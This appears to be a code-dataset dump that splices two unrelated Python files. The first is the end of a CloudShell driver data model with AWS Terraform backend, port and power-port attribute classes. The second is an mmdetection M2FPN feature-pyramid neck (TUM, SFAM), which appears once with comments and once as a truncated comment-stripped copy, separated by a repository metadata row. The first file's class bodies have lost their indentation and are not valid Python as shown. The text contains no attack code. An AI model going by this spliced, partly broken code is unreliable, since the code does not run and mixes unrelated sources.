    def __build_sub_resoruces_hierarchy(self, root, sub_resources, attributes):
        # Bucket child resources by depth (rank) so parents are attached
        # before their children.
        by_rank = defaultdict(list)
        for resource in sub_resources:
            parts = resource.relative_address.split('/')
            parent = '' if len(parts) == 1 else resource.relative_address.rsplit('/', 1)[0]
            by_rank[len(parts)].append((parent, resource))
        self.__set_models_hierarchy_recursively(by_rank, 1, root, '', attributes)

    def __set_models_hierarchy_recursively(self, rank_map, rank, manipulated_resource,
                                           resource_relative_addr, attributes):
        # BUGFIX: the original had ``if rank not in dict: pass`` which fell
        # through and relied on defaultdict auto-vivification (polluting the
        # map with empty entries); an explicit return is the intended base case.
        # The ``dict``-shadowing parameter is renamed to ``rank_map``.
        if rank not in rank_map:
            return
        for (parent, resource) in rank_map[rank]:
            if parent == resource_relative_addr:
                sub_resource = self.__create_resource_from_datamodel(
                    resource.model.replace(' ', ''),
                    resource.name)
                self.__attach_attributes_to_resource(attributes, resource.relative_address, sub_resource)
                manipulated_resource.add_sub_resource(
                    self.__slice_parent_from_relative_path(parent, resource.relative_address),
                    sub_resource)
                self.__set_models_hierarchy_recursively(
                    rank_map,
                    rank + 1,
                    sub_resource,
                    resource.relative_address,
                    attributes)

    def __attach_attributes_to_resource(self, attributes, curr_relative_addr, resource):
        # Attribute names become snake_case instance attributes.
        for attribute in attributes[curr_relative_addr]:
            setattr(resource, attribute.attribute_name.lower().replace(' ', '_'),
                    attribute.attribute_value)
        del attributes[curr_relative_addr]

    def __slice_parent_from_relative_path(self, parent, relative_addr):
        # BUGFIX: the original used ``parent is ''`` — an identity comparison
        # that only works because CPython interns the empty-string literal
        # (and warns on 3.8+); equality is the correct test.
        if parent == '':
            return relative_addr
        # Drop "<parent>/" from the front of the address.
        return relative_addr[len(parent) + 1:]

    def __generate_datamodel_classes_dict(self):
        return dict(self.__collect_generated_classes())

    def __collect_generated_classes(self):
        import sys, inspect
        return inspect.getmembers(sys.modules[__name__], inspect.isclass)
class AwsTfBackend(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = AwsTfBackend(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'AwsTfBackend'
@property
def bucket_name(self):
return self.attributes['Aws Tf Backend.Bucket Name'] if 'Aws Tf Backend.Bucket Name' in self.attributes else None
@bucket_name.setter
def bucket_name(self, value):
self.attributes['Aws Tf Backend.Bucket Name'] = value
@property
def region_name(self):
return self.attributes['Aws Tf Backend.Region Name'] if 'Aws Tf Backend.Region Name' in self.attributes else None
@region_name.setter
def region_name(self, value):
self.attributes['Aws Tf Backend.Region Name'] = value
@property
def access_key(self):
return self.attributes['Aws Tf Backend.Access Key'] if 'Aws Tf Backend.Access Key' in self.attributes else None
@access_key.setter
def access_key(self, value):
self.attributes['Aws Tf Backend.Access Key'] = value
@property
def secret_key(self):
return self.attributes['Aws Tf Backend.Secret Key'] if 'Aws Tf Backend.Secret Key' in self.attributes else None
@secret_key.setter
def secret_key(self, value):
self.attributes['Aws Tf Backend.Secret Key'] = value
@property
def cloud_provider(self):
return self.attributes['Aws Tf Backend.Cloud Provider'] if 'Aws Tf Backend.Cloud Provider' in self.attributes else None
@cloud_provider.setter
def cloud_provider(self, value):
self.attributes['Aws Tf Backend.Cloud Provider'] = value
@property
def hide_address(self):
return self.attributes['Aws Tf Backend.hide_address'] if 'Aws Tf Backend.hide_address' in self.attributes else None
@hide_address.setter
def hide_address(self, value='true'):
self.attributes['Aws Tf Backend.hide_address'] = value
@property
def user(self):
return self.attributes['Aws Tf Backend.User'] if 'Aws Tf Backend.User' in self.attributes else None
@user.setter
def user(self, value):
self.attributes['Aws Tf Backend.User'] = value
@property
def password(self):
return self.attributes['Aws Tf Backend.Password'] if 'Aws Tf Backend.Password' in self.attributes else None
@password.setter
def password(self, value):
self.attributes['Aws Tf Backend.Password'] = value
@property
def enable_password(self):
return self.attributes['Aws Tf Backend.Enable Password'] if 'Aws Tf Backend.Enable Password' in self.attributes else None
@enable_password.setter
def enable_password(self, value):
self.attributes['Aws Tf Backend.Enable Password'] = value
@property
def power_management(self):
return self.attributes['Aws Tf Backend.Power Management'] if 'Aws Tf Backend.Power Management' in self.attributes else None
@power_management.setter
def power_management(self, value=True):
self.attributes['Aws Tf Backend.Power Management'] = value
@property
def sessions_concurrency_limit(self):
return self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] if 'Aws Tf Backend.Sessions Concurrency Limit' in self.attributes else None
@sessions_concurrency_limit.setter
def sessions_concurrency_limit(self, value='1'):
self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] = value
@property
def snmp_read_community(self):
return self.attributes['Aws Tf Backend.SNMP Read Community'] if 'Aws Tf Backend.SNMP Read Community' in self.attributes else None
@snmp_read_community.setter
def snmp_read_community(self, value):
self.attributes['Aws Tf Backend.SNMP Read Community'] = value
@property
def snmp_write_community(self):
return self.attributes['Aws Tf Backend.SNMP Write Community'] if 'Aws Tf Backend.SNMP Write Community' in self.attributes else None
@snmp_write_community.setter
def snmp_write_community(self, value):
self.attributes['Aws Tf Backend.SNMP Write Community'] = value
@property
def snmp_v3_user(self):
return self.attributes['Aws Tf Backend.SNMP V3 User'] if 'Aws Tf Backend.SNMP V3 User' in self.attributes else None
@snmp_v3_user.setter
def snmp_v3_user(self, value):
self.attributes['Aws Tf Backend.SNMP V3 User'] = value
@property
def snmp_v3_password(self):
return self.attributes['Aws Tf Backend.SNMP V3 Password'] if 'Aws Tf Backend.SNMP V3 Password' in self.attributes else None
@snmp_v3_password.setter
def snmp_v3_password(self, value):
self.attributes['Aws Tf Backend.SNMP V3 Password'] = value
@property
def snmp_v3_private_key(self):
return self.attributes['Aws Tf Backend.SNMP V3 Private Key'] if 'Aws Tf Backend.SNMP V3 Private Key' in self.attributes else None
@snmp_v3_private_key.setter
def snmp_v3_private_key(self, value):
self.attributes['Aws Tf Backend.SNMP V3 Private Key'] = value
@property
def snmp_v3_authentication_protocol(self):
return self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] if 'Aws Tf Backend.SNMP V3 Authentication Protocol' in self.attributes else None
@snmp_v3_authentication_protocol.setter
def snmp_v3_authentication_protocol(self, value='No Authentication Protocol'):
self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] = value
@property
def snmp_v3_privacy_protocol(self):
return self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] if 'Aws Tf Backend.SNMP V3 Privacy Protocol' in self.attributes else None
@snmp_v3_privacy_protocol.setter
def snmp_v3_privacy_protocol(self, value='No Privacy Protocol'):
self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] = value
@property
def snmp_version(self):
return self.attributes['Aws Tf Backend.SNMP Version'] if 'Aws Tf Backend.SNMP Version' in self.attributes else None
@snmp_version.setter
def snmp_version(self, value=''):
self.attributes['Aws Tf Backend.SNMP Version'] = value
@property
def enable_snmp(self):
return self.attributes['Aws Tf Backend.Enable SNMP'] if 'Aws Tf Backend.Enable SNMP' in self.attributes else None
@enable_snmp.setter
def enable_snmp(self, value=True):
self.attributes['Aws Tf Backend.Enable SNMP'] = value
@property
def disable_snmp(self):
return self.attributes['Aws Tf Backend.Disable SNMP'] if 'Aws Tf Backend.Disable SNMP' in self.attributes else None
@disable_snmp.setter
def disable_snmp(self, value=False):
self.attributes['Aws Tf Backend.Disable SNMP'] = value
@property
def console_server_ip_address(self):
return self.attributes['Aws Tf Backend.Console Server IP Address'] if 'Aws Tf Backend.Console Server IP Address' in self.attributes else None
@console_server_ip_address.setter
def console_server_ip_address(self, value):
self.attributes['Aws Tf Backend.Console Server IP Address'] = value
@property
def console_user(self):
return self.attributes['Aws Tf Backend.Console User'] if 'Aws Tf Backend.Console User' in self.attributes else None
@console_user.setter
def console_user(self, value):
self.attributes['Aws Tf Backend.Console User'] = value
@property
def console_port(self):
return self.attributes['Aws Tf Backend.Console Port'] if 'Aws Tf Backend.Console Port' in self.attributes else None
@console_port.setter
def console_port(self, value):
self.attributes['Aws Tf Backend.Console Port'] = value
@property
def console_password(self):
return self.attributes['Aws Tf Backend.Console Password'] if 'Aws Tf Backend.Console Password' in self.attributes else None
@console_password.setter
def console_password(self, value):
self.attributes['Aws Tf Backend.Console Password'] = value
@property
def cli_connection_type(self):
return self.attributes['Aws Tf Backend.CLI Connection Type'] if 'Aws Tf Backend.CLI Connection Type' in self.attributes else None
@cli_connection_type.setter
def cli_connection_type(self, value='Auto'):
self.attributes['Aws Tf Backend.CLI Connection Type'] = value
@property
def cli_tcp_port(self):
return self.attributes['Aws Tf Backend.CLI TCP Port'] if 'Aws Tf Backend.CLI TCP Port' in self.attributes else None
@cli_tcp_port.setter
def cli_tcp_port(self, value):
self.attributes['Aws Tf Backend.CLI TCP Port'] = value
@property
def backup_location(self):
return self.attributes['Aws Tf Backend.Backup Location'] if 'Aws Tf Backend.Backup Location' in self.attributes else None
@backup_location.setter
def backup_location(self, value):
self.attributes['Aws Tf Backend.Backup Location'] = value
@property
def backup_type(self):
return self.attributes['Aws Tf Backend.Backup Type'] if 'Aws Tf Backend.Backup Type' in self.attributes else None
@backup_type.setter
def backup_type(self, value='File System'):
self.attributes['Aws Tf Backend.Backup Type'] = value
@property
def backup_user(self):
return self.attributes['Aws Tf Backend.Backup User'] if 'Aws Tf Backend.Backup User' in self.attributes else None
@backup_user.setter
def backup_user(self, value):
self.attributes['Aws Tf Backend.Backup User'] = value
@property
def backup_password(self):
return self.attributes['Aws Tf Backend.Backup Password'] if 'Aws Tf Backend.Backup Password' in self.attributes else None
@backup_password.setter
def backup_password(self, value):
self.attributes['Aws Tf Backend.Backup Password'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def system_name(self):
return self.attributes['CS_GenericResource.System Name'] if 'CS_GenericResource.System Name' in self.attributes else None
@system_name.setter
def system_name(self, value):
self.attributes['CS_GenericResource.System Name'] = value
@property
def vendor(self):
return self.attributes['CS_GenericResource.Vendor'] if 'CS_GenericResource.Vendor' in self.attributes else None
@vendor.setter
def vendor(self, value=''):
self.attributes['CS_GenericResource.Vendor'] = value
@property
def contact_name(self):
return self.attributes['CS_GenericResource.Contact Name'] if 'CS_GenericResource.Contact Name' in self.attributes else None
@contact_name.setter
def contact_name(self, value):
self.attributes['CS_GenericResource.Contact Name'] = value
@property
def location(self):
return self.attributes['CS_GenericResource.Location'] if 'CS_GenericResource.Location' in self.attributes else None
@location.setter
def location(self, value=''):
self.attributes['CS_GenericResource.Location'] = value
@property
def model(self):
return self.attributes['CS_GenericResource.Model'] if 'CS_GenericResource.Model' in self.attributes else None
@model.setter
def model(self, value=''):
self.attributes['CS_GenericResource.Model'] = value
@property
def model_name(self):
return self.attributes['CS_GenericResource.Model Name'] if 'CS_GenericResource.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_GenericResource.Model Name'] = value
class ResourcePort(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.ResourcePort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = ResourcePort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'ResourcePort'
@property
def mac_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] if 'Aws Tf Backend.ResourcePort.MAC Address' in self.attributes else None
@mac_address.setter
def mac_address(self, value=''):
self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] = value
@property
def ipv4_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] if 'Aws Tf Backend.ResourcePort.IPv4 Address' in self.attributes else None
@ipv4_address.setter
def ipv4_address(self, value):
self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] = value
@property
def ipv6_address(self):
return self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] if 'Aws Tf Backend.ResourcePort.IPv6 Address' in self.attributes else None
@ipv6_address.setter
def ipv6_address(self, value):
self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] = value
@property
def port_speed(self):
return self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] if 'Aws Tf Backend.ResourcePort.Port Speed' in self.attributes else None
@port_speed.setter
def port_speed(self, value):
self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def model_name(self):
return self.attributes['CS_Port.Model Name'] if 'CS_Port.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_Port.Model Name'] = value
class GenericPowerPort(object):
def __init__(self, name):
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.GenericPowerPort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
result = GenericPowerPort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
return 'GenericPowerPort'
@property
def model(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Model'] if 'Aws Tf Backend.GenericPowerPort.Model' in self.attributes else None
@model.setter
def model(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Model'] = value
@property
def serial_number(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] if 'Aws Tf Backend.GenericPowerPort.Serial Number' in self.attributes else None
@serial_number.setter
def serial_number(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] = value
@property
def version(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Version'] if 'Aws Tf Backend.GenericPowerPort.Version' in self.attributes else None
@version.setter
def version(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Version'] = value
@property
def port_description(self):
return self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] if 'Aws Tf Backend.GenericPowerPort.Port Description' in self.attributes else None
@port_description.setter
def port_description(self, value):
self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] = value
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def cloudshell_model_name(self):
return self._cloudshell_model_name
@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
self._cloudshell_model_name = value
@property
def model_name(self):
return self.attributes['CS_PowerPort.Model Name'] if 'CS_PowerPort.Model Name' in self.attributes else None
@model_name.setter
def model_name(self, value=''):
self.attributes['CS_PowerPort.Model Name'] = value
| true | true |
f71031a3fd2f8846d71ea867cc54aa76a975b9a1 | 9,412 | py | Python | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | 2 | 2020-06-23T14:12:03.000Z | 2020-11-13T02:52:30.000Z | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | 1 | 2021-11-10T10:42:33.000Z | 2021-11-10T10:42:33.000Z | mmdet/models/necks/m2fpn.py | ningdez/Tianchi_Cancer_303 | 59e9b6f906e48e7508f455ce29b97d430791fcf5 | [
"MIT"
] | null | null | null | '''
This code is based on pytorch_ssd and RFBNet.
Details about the modules:
TUM - Thinned U-shaped Module
MLFPN - Multi-Level Feature Pyramid Network
M2Det - Multi-level Multi-scale single-shot object Detector
Author: Qijie Zhao (zhaoqijie@pku.edu.cn)
Finished Date: 01/17/2019
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
import warnings
warnings.filterwarnings('ignore')
from ..registry import NECKS
from ..utils import ConvModule
class TUM(nn.Module):
    """Thinned U-shaped Module (TUM) of M2Det.

    A small encoder/decoder: ``scales - 1`` size-reducing convolutions form
    the encoder, then lateral 3x3 convolutions plus nearest-neighbour
    upsampling rebuild a pyramid of ``scales`` feature maps (coarsest first),
    optionally smoothed by 1x1 convolutions.
    """

    def __init__(self, first_level=True, input_planes=128, is_smooth=True,
                 side_channel=512, scales=6, conv_cfg=None, norm_cfg=None):
        super(TUM, self).__init__()
        self.is_smooth = is_smooth        # apply 1x1 smoothing convs to decoder outputs
        self.side_channel = side_channel  # width of the side input concatenated on non-first levels
        self.input_planes = input_planes
        self.planes = 2 * self.input_planes
        self.first_level = first_level
        self.scales = scales
        # Non-first TUMs receive the previous TUM's output concatenated onto
        # the input, so their input width grows by ``side_channel``.
        self.in1 = input_planes + side_channel if not first_level else input_planes

        # Encoder: stride-2 3x3 convs; the final step instead uses stride 1
        # with padding 0 (still shrinking the map by 2 pixels per side... by 2 total).
        self.layers = nn.Sequential()
        self.layers.add_module('{}'.format(len(self.layers)),
                               ConvModule(self.in1, self.planes, 3, 2, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg))
        for i in range(self.scales - 2):
            if not i == self.scales - 3:
                self.layers.add_module(
                    '{}'.format(len(self.layers)),
                    ConvModule(self.planes, self.planes, 3, 2, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
                )
            else:
                # Last encoder step: 3x3, stride 1, no padding.
                self.layers.add_module(
                    '{}'.format(len(self.layers)),
                    ConvModule(self.planes, self.planes, 3, 1, 0, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
                )

        # 1x1 conv applied to the coarsest encoder output before decoding.
        self.toplayer = nn.Sequential(ConvModule(self.planes, self.planes, 1, 1, 0, conv_cfg=conv_cfg, norm_cfg=norm_cfg))

        # Lateral 3x3 convs, one per decoder step; the last one operates on
        # the raw input feature, hence ``self.in1`` input channels.
        self.latlayer = nn.Sequential()
        for i in range(self.scales - 2):
            self.latlayer.add_module(
                '{}'.format(len(self.latlayer)),
                ConvModule(self.planes, self.planes, 3, 1, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
            )
        self.latlayer.add_module('{}'.format(len(self.latlayer)),
                                 ConvModule(self.in1, self.planes, 3, 1, 1, conv_cfg=conv_cfg, norm_cfg=norm_cfg))

        if self.is_smooth:
            # Optional 1x1 smoothing convs for every decoder output except
            # the coarsest (see forward()).
            smooth = list()
            for i in range(self.scales - 1):
                smooth.append(
                    ConvModule(self.planes, self.planes, 1, 1, 0, conv_cfg=conv_cfg, norm_cfg=norm_cfg)
                )
            self.smooth = nn.Sequential(*smooth)

    def _upsample_add(self, x, y, fuse_type='interp'):
        """Upsample ``x`` to ``y``'s spatial size (nearest) and add ``y``."""
        _, _, H, W = y.size()
        if fuse_type == 'interp':
            return F.interpolate(x, size=(H, W), mode='nearest') + y
        else:
            raise NotImplementedError

    def forward(self, x, y):
        """Run the encoder/decoder.

        :param x: input feature map.
        :param y: previous TUM's output, concatenated to ``x`` unless this is
            the first-level TUM (callers then pass a dummy value).
        :return: list of ``scales`` feature maps, coarsest (smallest) first.
        """
        if not self.first_level:
            x = torch.cat([x, y], 1)
        # Encoder outputs, finest first; index 0 is the (possibly concatenated) input itself.
        conved_feat = [x]
        for i in range(len(self.layers)):
            x = self.layers[i](x)
            conved_feat.append(x)

        # Decoder: start from the coarsest map, repeatedly upsample and add
        # the laterally-convolved encoder feature of the next finer scale.
        deconved_feat = [self.toplayer[0](conved_feat[-1])]
        for i in range(len(self.latlayer)):
            deconved_feat.append(
                self._upsample_add(
                    deconved_feat[i], self.latlayer[i](conved_feat[len(self.layers) - 1 - i])
                )
            )
        if self.is_smooth:
            # Smooth every decoder output except the coarsest one.
            smoothed_feat = [deconved_feat[0]]
            for i in range(len(self.smooth)):
                smoothed_feat.append(
                    self.smooth[i](deconved_feat[i + 1])
                )
            return smoothed_feat
        return deconved_feat
class SFAM(nn.Module):
    """Scale-wise Feature Aggregation Module (M2Det).

    Applies one squeeze-and-excitation style channel attention block per
    pyramid scale: global average pool -> 1x1 reduce -> ReLU -> 1x1 expand
    -> sigmoid, then reweights the input feature map channel-wise.
    """

    def __init__(self, planes, num_levels, num_scales, compress_ratio=16):
        """
        :param planes: channels contributed by each TUM level
        :param num_levels: number of TUM levels concatenated per scale
        :param num_scales: number of pyramid scales (attention blocks)
        :param compress_ratio: channel reduction ratio of the SE bottleneck
        """
        super(SFAM, self).__init__()
        self.planes = planes
        self.num_levels = num_levels
        self.num_scales = num_scales
        self.compress_ratio = compress_ratio

        # BUGFIX: the original built these with ``[nn.Conv2d(...)] * num_scales``,
        # which repeats the *same* module object so every scale silently shared
        # one set of weights, and it hard-coded ``// 16`` ignoring the
        # ``compress_ratio`` parameter. Create an independent SE block per
        # scale and honour the ratio.
        hidden = self.planes * self.num_levels // self.compress_ratio
        self.fc1 = nn.ModuleList([
            nn.Conv2d(self.planes * self.num_levels, hidden, 1, 1, 0)
            for _ in range(self.num_scales)
        ])
        self.relu = nn.ReLU(inplace=True)
        self.fc2 = nn.ModuleList([
            nn.Conv2d(hidden, self.planes * self.num_levels, 1, 1, 0)
            for _ in range(self.num_scales)
        ])
        self.sigmoid = nn.Sigmoid()
        self.avgpool = nn.AdaptiveAvgPool2d(1)

    def forward(self, x):
        """Reweight each per-scale feature map with its attention block.

        :param x: iterable of per-scale feature maps, each of shape
            (N, planes * num_levels, H_i, W_i)
        :return: list of reweighted feature maps, same shapes as the input
        """
        attention_feat = []
        for i, per_scale_feat in enumerate(x):
            weight = self.avgpool(per_scale_feat)
            weight = self.fc1[i](weight)
            weight = self.relu(weight)
            weight = self.fc2[i](weight)
            weight = self.sigmoid(weight)
            attention_feat.append(per_scale_feat * weight)
        return attention_feat
@NECKS.register_module
class M2FPN(nn.Module):
    """Multi-Level Feature Pyramid Network neck (M2Det, AAAI 2019).

    Fuses backbone features into one base feature, feeds it through a stack
    of ``num_levels`` TUMs, concatenates the same-scale outputs of all TUMs,
    and optionally reweights them with SFAM channel attention.
    """

    def __init__(self,
                 num_levels=8,
                 num_scales=5,
                 sfam=False,
                 smooth=True,
                 in_channels=[512, 2048],
                 out_channels=256, conv_cfg=None,
                 norm_cfg=None):
        '''
        M2Det: Multi-level Multi-scale single-shot object Detector.

        :param num_levels: number of stacked TUMs.
        :param num_scales: number of pyramid scales produced per TUM.
        :param sfam: apply SFAM channel attention to the fused outputs.
        :param smooth: passed to each TUM as ``is_smooth``.
        :param in_channels: backbone channel sizes.
            NOTE(review): ``construct_modules``/``forward`` index
            ``in_channels[2]`` and ``x[2]``, so the two-element default
            would raise IndexError — confirm callers always pass three.
            (Also a mutable default argument; left unchanged here.)
        :param out_channels: channels of each output feature map.
        '''
        super(M2FPN, self).__init__()
        self.planes = out_channels
        self.conv_cfg = conv_cfg
        self.norm_cfg = norm_cfg
        self.num_levels = num_levels
        self.num_scales = num_scales
        self.sfam = sfam
        self.smooth = smooth
        self.in_channels = in_channels
        self.shallow_out = 256  # channels of the reduced shallow feature
        self.deep_out = 512     # channels of the reduced deep feature
        self.construct_modules()

    def construct_modules(self,):
        """Create the TUM stack, fusion/reduction convs and output convs."""
        # Stack of TUMs: the first consumes only the base feature; later ones
        # also take the previous TUM's coarsest output as a side input.
        for i in range(self.num_levels):
            if i == 0:
                setattr(self,
                        'unet{}'.format(i + 1),
                        TUM(first_level=True,
                            input_planes=self.planes // 2,
                            is_smooth=self.smooth,
                            scales=self.num_scales,
                            side_channel=512))  # side channel isn't fixed.
            else:
                setattr(self,
                        'unet{}'.format(i + 1),
                        TUM(first_level=False,
                            input_planes=self.planes // 2,
                            is_smooth=self.smooth,
                            scales=self.num_scales,
                            side_channel=self.planes))

        # Reduce the shallow backbone feature, and fold the deepest feature
        # into the middle one before reducing it as well.
        self.reduce = ConvModule(self.in_channels[0], self.shallow_out, kernel_size=3, stride=1, padding=1)
        self.up_reduce_1 = ConvModule(self.in_channels[2], self.in_channels[1], kernel_size=1, stride=1)
        self.up_reduce_2 = ConvModule(self.in_channels[1], self.deep_out, kernel_size=1, stride=1)

        # BatchNorm applied to the finest fused map in forward().
        # NOTE(review): hard-coded 256*8 equals planes*num_levels only for the
        # default configuration — confirm for other out_channels/num_levels.
        self.Norm = nn.BatchNorm2d(256 * 8)

        # 1x1 convs shrinking the base feature to each TUM's input width.
        # NOTE(review): list multiplication repeats the *same* ConvModule, so
        # all ``leach`` entries share weights — confirm this is intended.
        self.leach = nn.ModuleList([ConvModule(
            self.deep_out + self.shallow_out,
            self.planes // 2,
            kernel_size=(1, 1), stride=(1, 1))] * self.num_levels)

        # construct localization and recognition layers
        conv_out = nn.ModuleList()
        for i in range(self.num_scales):
            conv_out.append(nn.Conv2d(self.planes * self.num_levels,
                                      self.planes,
                                      3, 1, 1))
        # NOTE(review): conv_out is already an nn.ModuleList; the re-wrap
        # below is redundant but harmless.
        self.conv_out = nn.ModuleList(conv_out)

        # construct SFAM module
        if self.sfam:
            self.sfam_module = SFAM(self.planes, self.num_levels, self.num_scales, compress_ratio=16)

    def init_weights(self):
        """Xavier-initialise every Conv2d in the neck."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                xavier_init(m, distribution='uniform')

    def forward(self, x):
        """
        :param x: backbone feature maps; x[0] is the shallow map, x[1]/x[2]
            the deeper ones (x[2] assumed half the spatial size of x[1],
            which is half of x[0] — implied by the scale_factor=2 upsamples).
        :return: tuple of ``num_scales`` maps, finest first.
        """
        assert len(x) == len(self.in_channels)
        # Fold x[2] into x[1], then concatenate the reduced shallow feature
        # with the upsampled deep feature to form the TUM base input.
        up_feats = x[1] + F.interpolate(self.up_reduce_1(x[2]), scale_factor=2, mode='nearest')
        base_feature = torch.cat(
            (self.reduce(x[0]), F.interpolate(self.up_reduce_2(up_feats), scale_factor=2, mode='nearest')), 1
        )

        # tum_outs is the multi-level multi-scale feature
        tum_outs = [getattr(self, 'unet{}'.format(1))(self.leach[0](base_feature), 'none')]
        for i in range(1, self.num_levels, 1):
            tum_outs.append(
                getattr(self, 'unet{}'.format(i + 1))(
                    self.leach[i](base_feature), tum_outs[i - 1][-1]
                )
            )
        # Concatenate same-scale outputs from every TUM; since each TUM
        # returns coarsest-first, iterating i downwards yields finest-first.
        sources = [torch.cat([_fx[i - 1] for _fx in tum_outs], 1) for i in range(self.num_scales, 0, -1)]

        # forward_sfam
        if self.sfam:
            sources = self.sfam_module(sources)
        sources[0] = self.Norm(sources[0])

        output = []
        for (x, cout) in zip(sources, self.conv_out):
            output.append(cout(x))
        return tuple(output)
| 39.881356 | 145 | 0.546855 | import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import xavier_init
import warnings
warnings.filterwarnings('ignore')
from ..registry import NECKS
from ..utils import ConvModule
class TUM(nn.Module):
def __init__(self, first_level=True, input_planes=128, is_smooth=True, side_channel=512, scales=6,
conv_cfg=None,
norm_cfg=None
):
super(TUM, self).__init__()
self.is_smooth = is_smooth
self.side_channel = side_channel
